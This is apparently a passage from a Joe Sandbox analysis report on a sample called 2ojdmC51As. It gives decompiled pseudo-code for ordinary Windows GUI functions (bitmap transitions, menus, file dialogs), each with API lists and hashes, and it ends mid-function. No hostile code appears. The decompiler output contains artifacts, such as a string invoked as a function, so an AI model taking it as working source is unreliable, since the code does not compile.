                                            			E00404577(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, int _a32, intOrPtr _a36, signed int _a40) {
                                            				struct HDC__* _v8;
                                            				int _v12;
                                            				struct HBITMAP__* _v16;
                                            				void* _t135;
                                            
                                            				_v8 = CreateCompatibleDC(_a16);
                                            				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
                                            				SelectObject(_v8, _v16);
                                            				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
                                            				_v12 = 0;
                                            				while(1) {
                                            					asm("cdq");
                                            					if(_v12 >= _a28 / _a40 + 1) {
                                            						break;
                                            					}
                                            					StretchBlt(_v8, _a28 - (_v12 + 1) * _a40, 0, (_v12 + 1) * _a40, _a32, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
                                            					BitBlt(_a16, _a20 + _a28 - (_v12 + 1) * _a40, _a24, (_v12 + 1) * _a40, _a32, _v8, _a28 - (_v12 + 1) * _a40, 0, 0xcc0020);
                                            					E0040381D(_a36);
                                            					_t135 = _t135 + 4;
                                            					_v12 = _v12 + 1;
                                            				}
                                            				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
                                            				DeleteObject(_v16);
                                            				DeleteDC(_v8);
                                            				return 1;
                                            			}








                                            APIs
                                            • CreateCompatibleDC.GDI32(?), ref: 00404581
                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00404596
                                            • SelectObject.GDI32(?,?), ref: 004045A7
                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 004045CE
                                            • StretchBlt.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00404637
                                            • BitBlt.GDI32(00000000,?,?,?,?,?,?,00000000,00CC0020), ref: 00404682
                                            • BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 004046BE
                                            • DeleteObject.GDI32(?), ref: 004046C8
                                            • DeleteDC.GDI32(?), ref: 004046D2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
                                            • String ID:
                                            • API String ID: 1300799366-0
                                            • Opcode ID: 5cd169734f3d4076a8351419a8053b8a42ab7ab7df8d0770ac810dba87890358
                                            • Instruction ID: a75907197356ce4ca66e83fb1b854f5ba4b4597ff605ca05275262f1e745a3b8
                                            • Opcode Fuzzy Hash: 5cd169734f3d4076a8351419a8053b8a42ab7ab7df8d0770ac810dba87890358
                                            • Instruction Fuzzy Hash: 7F51A5B6600109AFCB04CF98DD95EEE77B9FF8C348F118258FA09A7254D634E9118BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E00404816(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, int _a28, signed int _a32, intOrPtr _a36, signed int _a40) {
                                            				struct HDC__* _v8;
                                            				int _v12;
                                            				struct HBITMAP__* _v16;
                                            				void* _t135;
                                            
                                            				_v8 = CreateCompatibleDC(_a16);
                                            				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
                                            				SelectObject(_v8, _v16);
                                            				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
                                            				_v12 = 0;
                                            				while(1) {
                                            					asm("cdq");
                                            					if(_v12 >= _a32 / _a40 + 1) {
                                            						break;
                                            					}
                                            					StretchBlt(_v8, 0, _a32 - (_v12 + 1) * _a40, _a28, (_v12 + 1) * _a40, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
                                            					BitBlt(_a16, _a20, _a24 + _a32 - (_v12 + 1) * _a40, _a28, (_v12 + 1) * _a40, _v8, 0, _a32 - (_v12 + 1) * _a40, 0xcc0020);
                                            					E0040381D(_a36);
                                            					_t135 = _t135 + 4;
                                            					_v12 = _v12 + 1;
                                            				}
                                            				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
                                            				DeleteObject(_v16);
                                            				DeleteDC(_v8);
                                            				return 1;
                                            			}








                                            APIs
                                            • CreateCompatibleDC.GDI32(?), ref: 00404820
                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00404835
                                            • SelectObject.GDI32(?,?), ref: 00404846
                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0040486D
                                            • StretchBlt.GDI32(?,00000000,?,?,?,00000000,?,?,?,?,00CC0020), ref: 004048D6
                                            • BitBlt.GDI32(?,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00404921
                                            • BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 0040495D
                                            • DeleteObject.GDI32(?), ref: 00404967
                                            • DeleteDC.GDI32(?), ref: 00404971
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
                                            • String ID:
                                            • API String ID: 1300799366-0
                                            • Opcode ID: cb5311c6d517274d3363f8e51808646c66a29d66cd1ded68f5bbd400a57f7aa2
                                            • Instruction ID: 1794ec46a4d52dcc5cb24ae7db09ad2764e7e5e2d0b87eeeb5bcffab36add2c1
                                            • Opcode Fuzzy Hash: cb5311c6d517274d3363f8e51808646c66a29d66cd1ded68f5bbd400a57f7aa2
                                            • Instruction Fuzzy Hash: 375198B6600109AFCB04CF98D995EEE77B9FF8C344F158258FA09A7254C635ED11CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E0041E758(intOrPtr* __ecx, intOrPtr _a4) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				struct tagPOINT _v20;
                                            				void* __ebp;
                                            				signed int _t49;
                                            				struct HWND__* _t60;
                                            				intOrPtr _t63;
                                            				intOrPtr _t66;
                                            				void* _t68;
                                            				void* _t72;
                                            				intOrPtr _t81;
                                            				void* _t82;
                                            				intOrPtr _t83;
                                            				struct HWND__* _t85;
                                            				intOrPtr _t86;
                                            				intOrPtr* _t87;
                                            				void* _t88;
                                            
                                            				_t87 = __ecx;
                                            				_t42 = GetKeyState(1);
                                            				if(_t42 < 0) {
                                            					L31:
                                            					return _t42;
                                            				}
                                            				_t83 = E004249C4();
                                            				_v12 = _t83;
                                            				GetCursorPos( &_v20);
                                            				ScreenToClient( *(_t87 + 0x1c),  &_v20);
                                            				_t49 =  *((intOrPtr*)( *_t87 + 0x64))(_v20.x, _v20.y, 0, _t82);
                                            				_v8 = _t49;
                                            				if(_t49 < 0) {
                                            					 *(_t83 + 0x104) =  *(_t83 + 0x104) | 0xffffffff;
                                            					L16:
                                            					if(_v8 < 0) {
                                            						L25:
                                            						if( *(_v12 + 0x104) == 0xffffffff) {
                                            							KillTimer( *(_t87 + 0x1c), 0xe001);
                                            						}
                                            						 *((intOrPtr*)( *_t87 + 0xdc))(0xffffffff);
                                            						L28:
                                            						_t42 = 0xe000;
                                            						if(_a4 != 0xe000) {
                                            							goto L31;
                                            						}
                                            						_t42 = KillTimer( *(_t87 + 0x1c), 0xe000);
                                            						if(_v8 < 0) {
                                            							goto L31;
                                            						}
                                            						return  *((intOrPtr*)( *_t87 + 0xdc))(_v8);
                                            					}
                                            					ClientToScreen( *(_t87 + 0x1c),  &_v20);
                                            					_push(_v20.y);
                                            					_t85 = WindowFromPoint(_v20);
                                            					if(_t85 == 0) {
                                            						L23:
                                            						_t59 = _v12;
                                            						_v8 = _v8 | 0xffffffff;
                                            						 *(_t59 + 0x104) =  *(_v12 + 0x104) | 0xffffffff;
                                            						L24:
                                            						if(_v8 >= 0) {
                                            							goto L28;
                                            						}
                                            						goto L25;
                                            					}
                                            					_t60 =  *(_t87 + 0x1c);
                                            					if(_t85 == _t60 || IsChild(_t60, _t85) != 0) {
                                            						goto L24;
                                            					} else {
                                            						_t63 =  *((intOrPtr*)(_v12 + 0xcc));
                                            						if(_t63 != 0) {
                                            							_t63 =  *((intOrPtr*)(_t63 + 0x1c));
                                            						}
                                            						if(_t63 == _t85) {
                                            							goto L24;
                                            						} else {
                                            							goto L23;
                                            						}
                                            					}
                                            				}
                                            				_t72 = E00414CEF(_t87);
                                            				if(E00414D5B(_t87) == 0 || E004166B3(_t72) == 0) {
                                            					_v8 = _v8 | 0xffffffff;
                                            				}
                                            				_t66 =  *((intOrPtr*)(_t83 + 0xcc));
                                            				if(_t66 != 0) {
                                            					_t86 =  *((intOrPtr*)(_t66 + 0x1c));
                                            				} else {
                                            					_t86 = 0;
                                            				}
                                            				_t68 = E00413740(_t88, GetCapture());
                                            				if(_t68 != _t87) {
                                            					if(_t68 != 0) {
                                            						_t81 =  *((intOrPtr*)(_t68 + 0x1c));
                                            					} else {
                                            						_t81 = 0;
                                            					}
                                            					if(_t81 != _t86 && E00414CEF(_t68) == _t72) {
                                            						_v8 = _v8 | 0xffffffff;
                                            					}
                                            				}
                                            				goto L16;
                                            			}





















                                            APIs
                                            • GetKeyState.USER32(00000001), ref: 0041E764
                                            • GetCursorPos.USER32(?), ref: 0041E782
                                            • ScreenToClient.USER32 ref: 0041E78F
                                            • GetCapture.USER32 ref: 0041E7DF
                                              • Part of subcall function 004166B3: IsWindowEnabled.USER32(?), ref: 004166BD
                                            • ClientToScreen.USER32(?,?), ref: 0041E829
                                            • WindowFromPoint.USER32(?,?), ref: 0041E835
                                            • IsChild.USER32(?,00000000), ref: 0041E84A
                                            • KillTimer.USER32(?,0000E001), ref: 0041E890
                                            • KillTimer.USER32(?,0000E000), ref: 0041E8AD
                                              • Part of subcall function 00414D5B: GetForegroundWindow.USER32(00000000,?,0041E7BB), ref: 00414D5F
                                              • Part of subcall function 00414D5B: GetLastActivePopup.USER32(?), ref: 00414D77
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
                                            • String ID:
                                            • API String ID: 1383385731-0
                                            • Opcode ID: 44edb78afc276ab783549d9561dc10d3387f8a1e8d9759539a985f87b51eceed
                                            • Instruction ID: 60a7b001f52f4571865f2cd2d5ebedbd3e454d14a8c641626661d3e0f237eb6f
                                            • Opcode Fuzzy Hash: 44edb78afc276ab783549d9561dc10d3387f8a1e8d9759539a985f87b51eceed
                                            • Instruction Fuzzy Hash: 4D416334B00605DFDB20AF66CC44AEE7BB5EF44714F20866AE861D72E1D738DD819B58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E0040443F(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, int _a32, intOrPtr _a36, signed int _a40) {
                                            				struct HDC__* _v8;
                                            				int _v12;
                                            				struct HBITMAP__* _v16;
                                            				void* _t111;
                                            
                                            				_v8 = CreateCompatibleDC(_a16);
                                            				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
                                            				SelectObject(_v8, _v16);
                                            				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
                                            				_v12 = 0;
                                            				while(1) {
                                            					asm("cdq");
                                            					if(_v12 >= _a28 / _a40 + 1) {
                                            						break;
                                            					}
                                            					StretchBlt(_v8, 0, 0, (_v12 + 1) * _a40, _a32, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
                                            					BitBlt(_a16, _a20, _a24, (_v12 + 1) * _a40, _a32, _v8, 0, 0, 0xcc0020);
                                            					E0040381D(_a36);
                                            					_t111 = _t111 + 4;
                                            					_v12 = _v12 + 1;
                                            				}
                                            				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
                                            				DeleteObject(_v16);
                                            				DeleteDC(_v8);
                                            				return 1;
                                            			}








                                            APIs
                                            • CreateCompatibleDC.GDI32(?), ref: 00404449
                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040445E
                                            • SelectObject.GDI32(?,?), ref: 0040446F
                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 00404496
                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 004044ED
                                            • BitBlt.GDI32(00000000,00000000,?,?,?,?,00000000,00000000,00CC0020), ref: 0040451B
                                            • BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 00404557
                                            • DeleteObject.GDI32(?), ref: 00404561
                                            • DeleteDC.GDI32(?), ref: 0040456B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
                                            • String ID:
                                            • API String ID: 1300799366-0
                                            • Opcode ID: cc5d082e70818b573a522f2b25332a04e89bcefb0093d68fd00deffb3daad7d5
                                            • Instruction ID: 5871b13c33776004db1b10881a90cc129f1f9f80c304186c253610c93300aed5
                                            • Opcode Fuzzy Hash: cc5d082e70818b573a522f2b25332a04e89bcefb0093d68fd00deffb3daad7d5
                                            • Instruction Fuzzy Hash: D84164B6600108AFCB14CF98DD95FEE77B9EB8C744F118258FA09A7294D634ED11CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E004046DE(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, int _a28, signed int _a32, intOrPtr _a36, signed int _a40) {
                                            				struct HDC__* _v8;
                                            				int _v12;
                                            				struct HBITMAP__* _v16;
                                            				void* _t111;
                                            
                                            				_v8 = CreateCompatibleDC(_a16);
                                            				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
                                            				SelectObject(_v8, _v16);
                                            				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
                                            				_v12 = 0;
                                            				while(1) {
                                            					asm("cdq");
                                            					if(_v12 >= _a32 / _a40 + 1) {
                                            						break;
                                            					}
                                            					StretchBlt(_v8, 0, 0, _a28, (_v12 + 1) * _a40, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
                                            					BitBlt(_a16, _a20, _a24, _a28, (_v12 + 1) * _a40, _v8, 0, 0, 0xcc0020);
                                            					E0040381D(_a36);
                                            					_t111 = _t111 + 4;
                                            					_v12 = _v12 + 1;
                                            				}
                                            				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
                                            				DeleteObject(_v16);
                                            				DeleteDC(_v8);
                                            				return 1;
                                            			}








                                            APIs
                                            • CreateCompatibleDC.GDI32(?), ref: 004046E8
                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 004046FD
                                            • SelectObject.GDI32(?,?), ref: 0040470E
                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 00404735
                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 0040478C
                                            • BitBlt.GDI32(00000000,00000000,?,?,?,?,00000000,00000000,00CC0020), ref: 004047BA
                                            • BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 004047F6
                                            • DeleteObject.GDI32(?), ref: 00404800
                                            • DeleteDC.GDI32(?), ref: 0040480A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
                                            • String ID:
                                            • API String ID: 1300799366-0
                                            • Opcode ID: 7f207c6eba3032f2a70fab5f487ec57d68f369c1225f3a8e3d09705c4a8ace12
                                            • Instruction ID: 516329d77e908a997c244217de3d4d8bb9b87b0cd9461334f0d2af6cacd336f2
                                            • Opcode Fuzzy Hash: 7f207c6eba3032f2a70fab5f487ec57d68f369c1225f3a8e3d09705c4a8ace12
                                            • Instruction Fuzzy Hash: 6F4174B6600108EBCB04CF98DD95FAE77B9EB8C744F158258FA09A7250D634E9118BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E0041DF9A(signed int __ecx) {
                                            				void* _t33;
                                            				void* _t34;
                                            				CHAR* _t41;
                                            				signed int _t42;
                                            				signed int _t43;
                                            				struct HWND__* _t44;
                                            				signed int _t51;
                                            				void* _t53;
                                            				signed int _t62;
                                            				signed int _t73;
                                            				signed int _t75;
                                            				void* _t77;
                                            
                                            				E00406520(E0042A610, _t77);
                                            				_push(__ecx);
                                            				_t51 =  *(_t77 + 0xc);
                                            				_t62 = __ecx;
                                            				_t33 = 0x80c83b00;
                                            				 *(_t77 - 0x10) = __ecx;
                                            				 *((intOrPtr*)(__ecx + 0xb0)) = 1;
                                            				if((_t51 & 0x00000004) != 0) {
                                            					_t33 = 0x80c83300;
                                            				}
                                            				_t34 = E00422BCF(_t62, 0, 0, 0x4399a0, _t33, 0x439630,  *((intOrPtr*)(_t77 + 8)), 0);
                                            				if(_t34 != 0) {
                                            					asm("sbb esi, esi");
                                            					_t73 = ( ~(_t51 & 0x00005000) & 0x0000f000) + 0x00002000 | _t51 & 0x00000040;
                                            					_push(GetSystemMenu( *(_t62 + 0x1c), 0));
                                            					_t53 = E00417635();
                                            					DeleteMenu( *(_t53 + 4), 0xf000, 0);
                                            					DeleteMenu( *(_t53 + 4), 0xf020, 0);
                                            					DeleteMenu( *(_t53 + 4), 0xf030, 0);
                                            					DeleteMenu( *(_t53 + 4), 0xf120, 0);
                                            					_t41 =  *0x436980; // 0x436994
                                            					 *(_t77 + 0xc) = _t41;
                                            					 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
                                            					_t42 = E00417214(_t77 + 0xc, __eflags, 0xf011);
                                            					__eflags = _t42;
                                            					if(_t42 != 0) {
                                            						DeleteMenu( *(_t53 + 4), 0xf060, 0);
                                            						AppendMenuA( *(_t53 + 4), 0, 0xf060,  *(_t77 + 0xc));
                                            					}
                                            					_t75 =  *(_t77 - 0x10);
                                            					_t43 = E0041D0E3(_t75 + 0xcc,  *((intOrPtr*)(_t77 + 8)), _t73 | 0x50000000, 0xe81f);
                                            					__eflags = _t43;
                                            					if(_t43 != 0) {
                                            						__eflags = _t75;
                                            						if(_t75 != 0) {
                                            							_t44 =  *(_t75 + 0x1c);
                                            						} else {
                                            							_t44 = 0;
                                            						}
                                            						E00413740(_t77, SetParent( *(_t75 + 0xe8), _t44));
                                            						_push(1);
                                            						_pop(0);
                                            					}
                                            					 *(_t75 + 0xb0) =  *(_t75 + 0xb0) & 0x00000000;
                                            					_t27 = _t77 - 4;
                                            					 *_t27 =  *(_t77 - 4) | 0xffffffff;
                                            					__eflags =  *_t27;
                                            					E00416AEC(_t77 + 0xc);
                                            					_t34 = 0;
                                            				} else {
                                            					 *((intOrPtr*)(_t62 + 0xb0)) = 0;
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
                                            				return _t34;
                                            			}
















                                            APIs
                                            • __EH_prolog.LIBCMT ref: 0041DF9F
                                            • GetSystemMenu.USER32(?,00000000), ref: 0041E013
                                            • DeleteMenu.USER32(?,0000F000,00000000,00000000), ref: 0041E031
                                            • DeleteMenu.USER32(?,0000F020,00000000), ref: 0041E03D
                                            • DeleteMenu.USER32(?,0000F030,00000000), ref: 0041E049
                                            • DeleteMenu.USER32(?,0000F120,00000000), ref: 0041E055
                                            • DeleteMenu.USER32(?,0000F060,00000000,0000F011), ref: 0041E07E
                                            • AppendMenuA.USER32 ref: 0041E08D
                                            • SetParent.USER32(?,?,?,?,0000E81F,0000F011), ref: 0041E0CA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Menu$Delete$AppendH_prologParentSystem
                                            • String ID:
                                            • API String ID: 3391233131-0
                                            • Opcode ID: e21fefbac9b959bc40e50a7e112f0a59602f04dbb09a707c84792978608cf12c
                                            • Instruction ID: 3b28708bc0a1016f049b86d81bab26ae888aa54a77c2c6cf0aff380c6ea48e92
                                            • Opcode Fuzzy Hash: e21fefbac9b959bc40e50a7e112f0a59602f04dbb09a707c84792978608cf12c
                                            • Instruction Fuzzy Hash: 3431C271740211BBEB309F62CC46F9ABF64EF48714F118126FA09AA1E1C7B8A901CB5C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 47%
                                            			E004104E7(void* __ebx) {
                                            				struct HWND__* _v8;
                                            				struct HWND__* _v12;
                                            				void* __ecx;
                                            				void* __esi;
                                            				struct HWND__* _t28;
                                            				int _t31;
                                            				int _t32;
                                            				int _t34;
                                            				void* _t35;
                                            				void* _t40;
                                            				void* _t41;
                                            				signed int _t43;
                                            				signed int _t52;
                                            
                                            				_t40 = __ebx;
                                            				_t52 = _t43;
                                            				E00406330(lstrlenA( *(_t52 + 0x78)) + 1 +  *(_t52 + 0x78), 0,  *((intOrPtr*)(_t52 + 0x7c)) - lstrlenA( *(_t52 + 0x78)) + 1);
                                            				_v8 = GetFocus();
                                            				 *(_t52 + 0x60) = E004120A5(_t52);
                                            				E00413C3E();
                                            				_t28 =  *(_t52 + 0x60);
                                            				if(_t28 != 0 && IsWindowEnabled(_t28) != 0) {
                                            					_push(1);
                                            					_pop(0);
                                            					EnableWindow( *(_t52 + 0x60), 0);
                                            				}
                                            				_push(_t40);
                                            				_t41 = E004249C4();
                                            				if(( *(_t52 + 0x92) & 0x00000008) == 0) {
                                            					_push(_t52);
                                            					"VWh\rDB"();
                                            				} else {
                                            					 *(_t41 + 0x18) = _t52;
                                            				}
                                            				_push(_t52 + 0x5c);
                                            				if( *((intOrPtr*)(_t52 + 0xa8)) == 0) {
                                            					_t31 = GetSaveFileNameA();
                                            				} else {
                                            					_t31 = GetOpenFileNameA();
                                            				}
                                            				 *(_t41 + 0x18) =  *(_t41 + 0x18) & 0x00000000;
                                            				_v8 = _t31;
                                            				if(0 != 0) {
                                            					EnableWindow( *(_t52 + 0x60), 1);
                                            				}
                                            				_t32 = IsWindow(_v12);
                                            				_t64 = _t32;
                                            				if(_t32 != 0) {
                                            					SetFocus(_v12);
                                            				}
                                            				E004120DF(_t52, _t52, _t64);
                                            				_t34 = _v8;
                                            				if(_t34 == 0) {
                                            					_t35 = 2;
                                            					return _t35;
                                            				}
                                            				return _t34;
                                            			}

















                                            APIs
                                            • lstrlenA.KERNEL32(?), ref: 004104F1
                                            • GetFocus.USER32 ref: 0041050C
                                              • Part of subcall function 00413C3E: UnhookWindowsHookEx.USER32(?), ref: 00413C63
                                            • IsWindowEnabled.USER32(?), ref: 00410535
                                            • EnableWindow.USER32(?,00000000), ref: 00410547
                                            • GetOpenFileNameA.COMDLG32(?), ref: 00410572
                                            • GetSaveFileNameA.COMDLG32(?), ref: 00410579
                                            • EnableWindow.USER32(?,00000001), ref: 00410590
                                            • IsWindow.USER32(00000000), ref: 00410596
                                            • SetFocus.USER32(00000000), ref: 004105A4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Window$EnableFileFocusName$EnabledHookOpenSaveUnhookWindowslstrlen
                                            • String ID:
                                            • API String ID: 3606897497-0
                                            • Opcode ID: 26475a310f4ed8bf1bdae507504d36e30356123cd70d61a8b284773050b4369f
                                            • Instruction ID: cfd9afc9f89d739c60573f6ed008476d2ccbece9f7daf62680160fc279b61255
                                            • Opcode Fuzzy Hash: 26475a310f4ed8bf1bdae507504d36e30356123cd70d61a8b284773050b4369f
                                            • Instruction Fuzzy Hash: 68219271210700BFD724AF32DC4AB9B7BE9EF44305F04442EF55696292DBB9E8C18B99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 38%
                                            			E0041D3C1(intOrPtr __ecx, void* __edx, intOrPtr _a4, RECT* _a8) {
                                            				struct tagRECT _v20;
                                            				struct tagRECT _v36;
                                            				char _v296;
                                            				void* __ebp;
                                            				int _t61;
                                            				signed char _t64;
                                            				signed char _t69;
                                            				void* _t79;
                                            				struct HWND__* _t81;
                                            				intOrPtr _t109;
                                            				signed int _t115;
                                            				signed int _t117;
                                            				void* _t130;
                                            				signed int _t131;
                                            				intOrPtr _t134;
                                            				void* _t136;
                                            
                                            				_t130 = __edx;
                                            				_t134 = _a4;
                                            				_t109 = __ecx;
                                            				_t61 = GetWindowRect( *(_t134 + 0x1c),  &_v36);
                                            				if( *((intOrPtr*)(_t134 + 0x70)) != _t109) {
                                            					L3:
                                            					if( *((intOrPtr*)(_t109 + 0x78)) != 0 && ( *(_t134 + 0x68) & 0x00000040) != 0) {
                                            						 *(_t109 + 0x64) =  *(_t109 + 0x64) | 0x00000040;
                                            					}
                                            					 *(_t109 + 0x64) =  *(_t109 + 0x64) & 0xfffffff9;
                                            					_t64 =  *(_t134 + 0x64) & 0x00000006 |  *(_t109 + 0x64);
                                            					 *(_t109 + 0x64) = _t64;
                                            					if((_t64 & 0x00000040) == 0) {
                                            						E004165E5(_t134,  &_v296, 0x104);
                                            						E0041A843( *(_t109 + 0x1c),  &_v296);
                                            					}
                                            					_t69 = ( *(_t109 + 0x64) ^  *(_t134 + 0x64)) & 0x0000f000 ^  *(_t134 + 0x64) | 0x0000000f;
                                            					if( *((intOrPtr*)(_t109 + 0x78)) == 0) {
                                            						_t70 = _t69 & 0x000000fe;
                                            						__eflags = _t69 & 0x000000fe;
                                            					} else {
                                            						_t70 = _t69 | 0x00000001;
                                            					}
                                            					E004263C3(_t134, _t70);
                                            					_t131 = E0041DCB9(_t109, GetDlgCtrlID( *(_t134 + 0x1c)) & 0x0000ffff, 0xffffffff);
                                            					if(_t131 > 0) {
